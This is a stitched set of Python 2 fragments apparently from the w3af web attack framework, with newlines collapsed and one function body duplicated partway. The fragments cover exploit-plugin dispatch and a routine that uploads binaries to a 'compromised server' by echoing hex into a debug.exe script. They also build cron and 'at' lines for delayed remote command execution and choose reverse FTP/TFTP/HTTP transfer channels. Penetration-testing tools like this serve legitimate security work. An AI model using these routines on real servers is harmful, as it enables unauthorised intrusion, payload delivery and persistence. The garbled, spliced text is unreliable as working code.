def _exploit( self , pluginName, params, showList=True): ''' Exploits a vuln. using a single plugin. ''' # Did the user indicated what vulnerability to exploit ? if len( params ) == 1: try: vulnToExploit = params[0] if vulnToExploit != '*': vulnToExploit = int(params[0]) except: raise w3afException( 'You specified an invalid vulnerability id.' ) else: vulnToExploit = None if pluginName not in self._configs: raise w3afException( 'Unknown plugin. Use the list command to view available plugins.' ) else: self._plugin = plugin = self._w3af.plugins.getPluginInstance( pluginName, 'attack' ) try: response = plugin.canExploit( vulnToExploit ) except w3afException, e: raise e else:
def _configExploit( self, params ): if len( params ) == 0: raise w3afException( 'Plugin name was expected.') if len( params ) > 1: raise w3afException( 'Unexpected parameters: ' + ','.join(params[1:]) ) pluginName = params[0] if pluginName not in self._configs: raise w3afException( "Unknown plugin " + pluginName) return self._configs[pluginName]
def transfer( self, strObject, destination ): ''' This method is used to transfer the strObject from w3af to the compromised server. ''' om.out.debug('Starting upload.') self._filename = self._getFilename( destination ) # Check if echo exists and works as expected if not self._exec_methodutedCanTransfer: if not self.canTransfer(): raise w3afException('Failed to transfer file to the compromised server, echoWin.canTransfer returned False.') # if exists, delete _filename res = self._exec_method('del ' + self._filename ) # Prepare the scr file. self._exec_method( 'echo n ' + self._filename + '._ >> ' + self._filename ) self._exec_method( 'echo r cx' + ' >> ' + self._filename ) self._exec_method( 'echo ' + hex(len(strObject))[2:] + ' >> ' + self._filename) self._exec_method( 'echo f 0000 ffff 00' + ' >> ' + self._filename ) # http://www.totse.com/en/technology/computer_technology/windowsdebugco172680.html i = 0 j = 256 while i < len( strObject ): # Prepare the command cmd = "echo e " + hex(j)[2:] for c in strObject[i:i+self._step]: cmd += ' ' + hex(ord(c))[2:].zfill(2) cmd += " >> " + self._filename i += self._step j += self._step # Send the command to the remote server self._exec_method( cmd ) # "close" the scr file self._exec_method( 'echo w >> ' + self._filename ) self._exec_method( 'echo q >> ' + self._filename ) # Now, I transform the text file into a exe # this trick was taken from sqlninja! om.out.debug('Transforming the text file into a binary file. Thanks to icesurfer and sqlninja for this technique!') res = self._exec_method( 'debug < ' + self._filename ) if 'file creation error' in res.lower(): raise w3afException('Error in remote debug.exe command.') extension = self._getExtension( destination ) om.out.debug('Changing the extension of the binary file to match the original one ()') res = self._exec_method( 'move ' + self._filename + '._ ' + self._filename + '.' + extension )
def _createCronLine( self, remoteDate, commandToExec ): ''' Creates a crontab line that executes the command one minute after the "date" parameter. @return: A tuple with the new line to add to the crontab, and the time that it will take to run the command. ''' resLine = '' try: # date +"%d-%m-%H:%M:%S-%u" dayNumber, month, hour, weekDay = remoteDate.split('-') except: raise w3afException('The date command of the remote server returned an unknown format.') else: hour, minute, sec = hour.split(':') waitTime = None if int(sec) > 57: # Just to be 100% sure... delta = 2 waitTime = 4 + 60 else: delta = 1 waitTime = 60 - int(sec) minute = int( minute ) + delta hour, minute, amPm = self._fixTime( hour, minute ) resLine = str( minute ) + ' ' + str(hour) + ' ' + str(dayNumber) + ' ' + str(month) + ' ' + str(weekDay) + ' ' + commandToExec return resLine, waitTime
def _cmd_fastexploit( self , parameters, showList=True): ''' Performs fast exploiting based on the parameters provided by the user, and the previous plugin configuration. ''' # I need this to have logging! self._w3af.plugins.init_plugins() if not len( parameters ): om.out.console( 'Incorrect call to fastexploit, please see the help:' ) self._cmd_help( ['fastexploit'] ) else: pluginName = parameters[0] if pluginName not in self._w3af.plugins.getPluginList('attack'): om.out.console( 'Unknown plugin. Use the list command to view available plugins.' ) else: self._plugin = plugin = self._w3af.plugins.getPluginInstance( pluginName, 'attack' ) try: exploit_result = plugin.fastExploit() except Exception, e: raise # Assign a unique identifier to this shell for i in range(len(self._exploitResults), len(exploit_result) ): exploit_result[i].setExploitResultId( i ) if not exploit_result: raise w3afException( 'Failed to exploit vulnerability.') else: self._exploitResults.extend( exploit_result ) om.out.console( 'Vulnerability successfully exploited. ' , newLine=not showList ) if showList: self._show() om.out.console( 'Please use the interact command to interact with the shell objects.' )
def getPriority( self ): ''' This function is called when sorting mangle plugins. Each mangle plugin should implement this. @return: An integer specifying the priority. 100 is runned first, 0 last. ''' raise w3afException('Plugin is not implementing required method getPriority' )
def getDelayedExecutionHandler( self ): os = osDetectionExec( self._execMethod ) if os == 'windows': return atHandler( self._execMethod ) elif os == 'linux': return crontabHandler( self._execMethod ) else: raise w3afException('Failed to create a delayed execution handler.')
def mangleResponse(self, response ): ''' This method mangles the response. This method MUST be implemented on every plugin. @param response: This is the response to mangle. @return: A mangled version of the response. ''' raise w3afException('Plugin is not implementing required method mangleResponse' )
def _createAtCommand( self, time, command ): ''' Creates an at command based on the time and command parameter. This is the format i'm expecting for the time parameter: The current time is: 11:24:19.59 Enter the new time: @return: A tuple with the "at" command, and the time that it will take to run the command. ''' res = 'at ' try: time = time.split('\n')[0].split(':')[1:] hour = time[0] minute = time[1] if '.' in time[2]: # windows 2k seconds = time[2].split('.')[0] else: # windows XP. This assholes reimplement the time command from one release to another... seconds = time[2].split(',')[0] # TODO ( see below ) if int(hour) > 12: amPm = '' else: # TODO ! # analyze... before I had amPm = 'a' ; check if this is really necesary amPm = '' except: raise w3afException('The time command of the remote server returned an unknown format.') else: if int(seconds) > 57: # Just to be 100% sure... delta = 2 waitTime = 60 + 5 else: delta = 1 waitTime = 60 - int(seconds) minute = int( minute ) + delta hour, minute, amPm = self._fixTime( hour, minute, amPm ) res += str(hour) + ':' + str( minute ).zfill(2) + amPm + ' ' + command return res, waitTime
def _exploitAll( self, params ): lp = len(params) stopOnFirst = len(params)>0 and params[0] =='stopOnFirst' maxLen = int(stopOnFirst) if len(params)>maxLen: raise w3afException( 'Unexpected parameters: ' + \ ','.join(params[maxLen:])) vuln_list = kb.kb.getAllVulns() if not vuln_list: om.out.console('They are no vulnerabilities to exploit.') else: attackPluginList = self._w3af.plugins.getPluginList( 'attack' ) #Now I create the instances... instanceList = [] for pluginName in attackPluginList: instanceList.append( self._w3af.plugins.getPluginInstance( pluginName, 'attack' ) ) # Its time to sort... def sortfunc(x,y): # reverse ordering... return cmp( y.getRootProbability(), x.getRootProbability() ) instanceList.sort( sortfunc ) # To have a nicer console ;) not_run = [] continue_exploiting = True # Exploit ! for ap in instanceList: if not continue_exploiting: break if not ap.canExploit(): # save to report later not_run.append(ap.getName()) else: # can exploit! msg = 'Executing '+ ap.getName() +'.attack plugin to all vulnerabilities:' om.out.console( msg ) for vuln_obj in vuln_list: continue_exploiting = True msg = '- Exploiting vulnerability with id:' + str(vuln_obj.getId()) om.out.console( msg ) try: self._exploit( ap.getName() , vuln_obj.getId(), showList=False ) except w3afException, w: continue_exploiting = True om.out.console( str(w) ) else: # We get here when the exploit was successful if stopOnFirst: continue_exploiting = False break om.out.console('') msg = 'The following plugins weren\'t run because they can\'t exploit any of the' msg += ' previously discovered vulnerabilities: ' + ', '.join(not_run) om.out.console( msg ) om.out.console('') if self._exploitResults: self._show() om.out.console( 'Please use the "interact" command to use the shell objects.' )
raise w3afException( 'You specified an invalid vulnerability id.' ) else: vulnToExploit = None if pluginName not in self._configs: raise w3afException( 'Unknown plugin. Use the list command to view available plugins.' ) else: self._plugin = plugin = self._w3af.plugins.getPluginInstance( pluginName, 'attack' ) try: response = plugin.canExploit( vulnToExploit ) except w3afException, e: raise e else: if not response: raise w3afException( 'No exploitable vulnerabilities found.' ) else: try: exploit_result = plugin.exploit( vulnToExploit ) except w3afMustStopException, w3mse: raise w3afException( str(w3mse) ) except w3afException, w3: raise w3 else: # everything went ok! if not exploit_result: raise w3afException( 'Failed to exploit vulnerability.') else: # Assign a unique identifier to this shell for i in range(len(self._exploitResults), len(exploit_result) ): exploit_result[i].setExploitResultId( i )
def getSpeed( self ): ''' @return: The transfer speed of the transfer object. It should return a number between 100 (fast) and 1 (slow) ''' raise w3afException('You should implement the getSpeed method when you inherit from echo.')
def transfer( self, strObject, destination ): ''' This method is used to transfer the strObject from w3af to the compromised server, ''' raise w3afException('You should implement the transfer method when you inherit from basePayloadTransfer.')
def estimateTransferTime( self, size ): ''' @return: An estimated transfer time for a file with the specified size. ''' raise w3afException('You should implement the estimateTransferTime method when you inherit from basePayloadTransfer.')
def canTransfer( self ): ''' This method is used to test if the transfer method works as expected. Usually the implementation of this should transfer 10 bytes and check if they arrived as expected to the other end. ''' raise w3afException('You should implement the canTransfer method when you inherit from basePayloadTransfer.')
try: if not inboundPort: inboundPort = self._es.getInboundPort() except w3afException, w3: om.out.error( 'The extrusion test failed, no reverse connect transfer methods can be used. Trying inband echo transfer method.' ) om.out.error( 'Error: ' + str(w3) ) except Exception, e: om.out.error('Unhandled exception: ' + str(e) ) else: to_test.append( reverseFTP( self._exec_method, os, inboundPort ) ) if os == 'windows': to_test.append( clientlessReverseTFTP( self._exec_method, os, inboundPort ) ) elif os == 'linux': to_test.append( clientlessReverseHTTP( self._exec_method, os, inboundPort ) ) # Test the fastest first and return the fastest one... def sortFunction( x ,y ): return cmp( y.getSpeed() , x.getSpeed() ) to_test.sort( sortFunction ) for method in to_test: om.out.debug('Testing if "' + str(method) + '" is able to transfer a file to the compromised host.') if method.canTransfer(): om.out.debug('The "' + str(method) + '" method is able to transfer a file to the compromised host.') return method else: om.out.debug('The "' + str(method) + '" method *FAILED* to transfer a file to the compromised host.') raise w3afException('Failed to transfer a file to the remote host! All the transfer methods failed.')